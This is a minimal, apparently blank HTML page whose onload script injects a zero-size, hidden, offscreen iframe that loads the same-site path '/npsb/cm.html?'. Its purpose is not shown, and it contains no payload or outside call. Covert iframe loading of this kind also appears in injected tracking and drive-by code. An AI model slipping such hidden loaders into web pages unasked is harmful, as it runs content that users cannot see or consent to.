﻿<!DOCTYPE html>
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
    <title></title>
    <script type="text/javascript">
        window.onload = function () {
            var _body = document.getElementsByTagName('body');
            if (_body.length == 0)
                return;
            var _page = document.createElement('iframe');
            _page.setAttribute("width", '0');
            _page.setAttribute("height", '0');
            _page.setAttribute("style", 'display: none; position: absolute; top: -100px; left: -100px;');
            _page.setAttribute('src', '/npsb/cm.html?');
            _body[0].appendChild(_page);
        }

    </script>
</head>
<body>

</body>
</html>
